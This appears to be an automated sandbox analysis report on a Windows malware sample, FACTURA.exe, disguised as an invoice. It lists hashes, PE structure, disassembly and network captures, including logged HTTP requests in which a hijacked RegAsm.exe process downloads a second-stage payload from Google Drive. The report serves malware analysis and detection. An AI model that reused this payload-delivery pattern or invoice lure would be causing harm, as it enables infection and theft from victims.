                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:FACTURA.exe
                                          File size:90112
                                          MD5:dbe61cfd43c95752f6dfbde236558782
                                          SHA1:71b7f9ea7778a67ffc75fa0f7d8a74dc243aae22
                                          SHA256:7194eca2c497f9ea9c3bb989fb7f328d9740b6d396af39ec66ec730c0db61044
                                          SHA512:080df78e19db66f774e4924875da9301fdfb164563b32e3bbf3e32ef720de2d146e2e67f7752eea5ac1d30c64f81209a9b52a1d3a48009402e9f5b91b41226c7
                                          SSDEEP:768:t2FgA8P1DadQOyLO/j5RhgmDSXlqhZLkVYC5OEn7m7j1Oavx6aG7Cj7nFytQ:t2AP1msO7ZgmDSVq7VUlIj1jJ6nm7/
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....l.Y.................0... ...............@....@........

                                          File Icon

                                          Icon Hash:821ca88c8e8c8c00

                                          Static PE Info

                                          General

                                          Entrypoint:0x4012c8
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x59A36C05 [Mon Aug 28 01:04:05 2017 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                          Entrypoint Preview

                                          Instruction
                                          push 004102D0h
                                          call 00007F3410B6B093h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          xor byte ptr [eax], al
                                          add byte ptr [eax], al
                                          inc eax
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax-68h], cl
                                          cmp dword ptr [ebp+44E604D0h], edx
                                          lahf
                                          adc al, BDh
                                          add bh, al
                                          adc al, DEh
                                          mov esp, 00000000h
                                          add byte ptr [eax], al
                                          add dword ptr [eax], eax
                                          add byte ptr [eax], al
                                          inc edx
                                          add byte ptr [esi], al
                                          push eax
                                          add dword ptr [ecx], 53h
                                          dec ebx
                                          inc ecx
                                          inc esp
                                          inc ebp
                                          dec esp
                                          dec ecx
                                          inc edi
                                          push ebx
                                          push esp
                                          inc ebp
                                          add ah, al
                                          sub dword ptr [ebx], ecx
                                          add eax, dword ptr [eax]
                                          add byte ptr [eax], al
                                          add bh, bh
                                          int3
                                          xor dword ptr [eax], eax
                                          cmp cl, ah
                                          jmp far 4561h : 5915348Fh
                                          test eax, D213FA98h
                                          mov esp, edi
                                          rol byte ptr [edx], FFFFFFF1h
                                          call 00007F3423A59666h
                                          dec eax
                                          call far E4BBh : 71A84919h
                                          imul edi, dword ptr [edx], 9933AD4Fh
                                          iretw
                                          adc dword ptr [edi+00AA000Ch], esi
                                          pushad
                                          rcl dword ptr [ebx+00000000h], cl
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          pop edi
                                          in eax, dx
                                          add byte ptr [eax], al
                                          test byte ptr [ecx], al
                                          add byte ptr [eax], al
                                          add byte ptr [656C4600h], al
                                          jnc 00007F3410B6B0D7h
                                          add byte ptr [65000301h], cl
                                          insb
                                          outsd
                                          add byte ptr [ecx], bl
                                          add dword ptr [eax], eax
                                          inc edx
                                          add byte ptr [edx], ah

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x139e40x28.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x548.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x12e4c0x13000False0.52587890625data6.31843765659IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc0x150000x5480x1000False0.132080078125data1.43485201544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x154200x128GLS_BINARY_LSB_FIRST
                                          RT_GROUP_ICON0x1540c0x14data
                                          RT_VERSION0x150f00x31cdataChineseTaiwan

                                          Imports

                                          DLLImport
                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                          Version Infos

                                          DescriptionData
                                          Translation0x0404 0x04b0
                                          LegalCopyrightChatSwipe
                                          InternalNameexposure
                                          FileVersion4.04.0001
                                          CompanyNameChatSwipe
                                          LegalTrademarksChatSwipe
                                          CommentsChatSwipe
                                          ProductNameChatSwipe
                                          ProductVersion4.04.0001
                                          FileDescriptionChatSwipe
                                          OriginalFilenameexposure.exe

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          ChineseTaiwan

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 28, 2021 08:58:05.862684011 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:05.862704039 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:05.862835884 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:05.872072935 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:05.872082949 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:05.903938055 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:05.904067039 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:05.904072046 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:05.904114008 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:05.904552937 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:05.904726982 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.024425983 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.024624109 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.024801970 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.027190924 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.069895983 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.546551943 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.546581030 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.546785116 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.547451019 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.547569990 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.547647953 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.547729015 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.551752090 CEST49792443192.168.11.20142.250.185.206
                                          Sep 28, 2021 08:58:06.551773071 CEST44349792142.250.185.206192.168.11.20
                                          Sep 28, 2021 08:58:06.626863003 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.626892090 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.627065897 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.627454996 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.627469063 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.660593987 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.660769939 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.661365032 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.661551952 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.665054083 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.665231943 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.665419102 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.665683985 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.705899954 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.894476891 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.894733906 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.895237923 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.895451069 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.896004915 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.896238089 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.897227049 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.897330999 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.897445917 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.897458076 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.897545099 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.897663116 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.899642944 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.899857044 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.902517080 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.902729988 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.904156923 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.904398918 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.904411077 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.904613972 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.904624939 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.904824018 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.904831886 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.905041933 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.905162096 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.905339003 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.905349970 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.905565023 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.905792952 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.905999899 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.906012058 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.906203985 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.906466961 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.906646967 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.906658888 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.906830072 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.907103062 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.907272100 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.907284975 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.907459021 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.907764912 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.907932043 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.907941103 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.908109903 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.908442020 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.908577919 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.908581972 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.908756018 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.909063101 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.909235954 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.909243107 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.909451962 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.909749985 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.909950972 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.909960032 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.910132885 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.910432100 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.910589933 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.910597086 CEST44349793142.250.186.33192.168.11.20
                                          Sep 28, 2021 08:58:06.910772085 CEST49793443192.168.11.20142.250.186.33
                                          Sep 28, 2021 08:58:06.911084890 CEST44349793142.250.186.33192.168.11.20

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 28, 2021 08:57:16.847090006 CEST6112653192.168.11.201.1.1.1
                                          Sep 28, 2021 08:57:16.856189966 CEST53611261.1.1.1192.168.11.20
                                          Sep 28, 2021 08:57:16.982496023 CEST5866053192.168.11.201.1.1.1
                                          Sep 28, 2021 08:57:16.991245985 CEST53586601.1.1.1192.168.11.20
                                          Sep 28, 2021 08:58:05.841886044 CEST4935353192.168.11.201.1.1.1
                                          Sep 28, 2021 08:58:05.850344896 CEST53493531.1.1.1192.168.11.20
                                          Sep 28, 2021 08:58:06.588934898 CEST6262653192.168.11.201.1.1.1
                                          Sep 28, 2021 08:58:06.625581026 CEST53626261.1.1.1192.168.11.20
                                          Sep 28, 2021 08:58:07.803257942 CEST5909653192.168.11.201.1.1.1
                                          Sep 28, 2021 08:58:07.811625004 CEST53590961.1.1.1192.168.11.20
                                          Sep 28, 2021 08:59:41.776287079 CEST5638853192.168.11.201.1.1.1
                                          Sep 28, 2021 08:59:41.814527988 CEST53563881.1.1.1192.168.11.20
                                          Sep 28, 2021 09:00:50.995796919 CEST5142953192.168.11.201.1.1.1
                                          Sep 28, 2021 09:00:51.004539013 CEST53514291.1.1.1192.168.11.20
                                          Sep 28, 2021 09:03:40.599010944 CEST5269553192.168.11.201.1.1.1
                                          Sep 28, 2021 09:03:40.608478069 CEST53526951.1.1.1192.168.11.20

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 28, 2021 08:58:05.841886044 CEST192.168.11.201.1.1.10x5247Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                          Sep 28, 2021 08:58:06.588934898 CEST192.168.11.201.1.1.10xe28Standard query (0)doc-08-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                          Sep 28, 2021 08:59:41.776287079 CEST192.168.11.201.1.1.10xfcc6Standard query (0)mail.reyesyasociados.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 28, 2021 08:58:05.850344896 CEST1.1.1.1192.168.11.200x5247No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)
                                          Sep 28, 2021 08:58:06.625581026 CEST1.1.1.1192.168.11.200xe28No error (0)doc-08-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                          Sep 28, 2021 08:58:06.625581026 CEST1.1.1.1192.168.11.200xe28No error (0)googlehosted.l.googleusercontent.com142.250.186.33A (IP address)IN (0x0001)
                                          Sep 28, 2021 08:59:41.814527988 CEST1.1.1.1192.168.11.200xfcc6No error (0)mail.reyesyasociados.com109.169.39.245A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • drive.google.com
                                          • doc-08-50-docs.googleusercontent.com

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.11.2049792142.250.185.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          TimestampkBytes transferredDirectionData
                                          2021-09-28 06:58:06 UTC0OUTGET /uc?export=download&id=1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: drive.google.com
                                          Cache-Control: no-cache
                                          2021-09-28 06:58:06 UTC0INHTTP/1.1 302 Moved Temporarily
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                          Pragma: no-cache
                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                          Date: Tue, 28 Sep 2021 06:58:06 GMT
                                          Location: https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9hm55ekloh95nskj64c1gjp2b/1632812250000/00519186742208262786/*/1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK?e=download
                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                          Content-Security-Policy: script-src 'nonce-Us3VkXj8yBOaUagAdbI1VA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                          X-Content-Type-Options: nosniff
                                          X-Frame-Options: SAMEORIGIN
                                          X-XSS-Protection: 1; mode=block
                                          Server: GSE
                                          Set-Cookie: NID=511=E82ydNqrpWSDsz_FSTk6UDRozLxh5YT-WeDD_JIClvrvncbu7I-k5lrwSVsAqUWXM0g0oPdr9Wd17wxzyrpWfFMeA-gdXERDb1w4oFBd-Gv_0GQo9N5nA_i0-tajdwW7zvdJ8DSsdgANffXIczG_pW63Sj54aJbk6iy6aQBSpCc; expires=Wed, 30-Mar-2022 06:58:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                          Accept-Ranges: none
                                          Vary: Accept-Encoding
                                          Connection: close
                                          Transfer-Encoding: chunked
                                          2021-09-28 06:58:06 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 31 62 62 31
                                          Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb1
                                          2021-09-28 06:58:06 UTC1INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.11.2049793142.250.186.33443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          TimestampkBytes transferredDirectionData
                                          2021-09-28 06:58:06 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9hm55ekloh95nskj64c1gjp2b/1632812250000/00519186742208262786/*/1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK?e=download HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Cache-Control: no-cache
                                          Host: doc-08-50-docs.googleusercontent.com
                                          Connection: Keep-Alive
                                          2021-09-28 06:58:06 UTC2INHTTP/1.1 200 OK
                                          X-GUploader-UploadID: ADPycdsKqGEafczU_8gKGh51ayizwRyJhL2_RjqeJrwSa_YQ9_KOSiTwdKVJVhXUf6t86099HLGWlRj7oeBI0GIrXvmrIKIQ2w
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: false
                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                          Access-Control-Allow-Methods: GET,OPTIONS
                                          Content-Type: application/octet-stream
                                          Content-Disposition: attachment;filename="nappy_kNvtVALhQ24.bin";filename*=UTF-8''nappy_kNvtVALhQ24.bin
                                          Date: Tue, 28 Sep 2021 06:58:06 GMT
                                          Expires: Tue, 28 Sep 2021 06:58:06 GMT
                                          Cache-Control: private, max-age=0
                                          X-Goog-Hash: crc32c=fTPUGA==
                                          Content-Length: 221760
                                          Server: UploadServer
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                          Connection: close
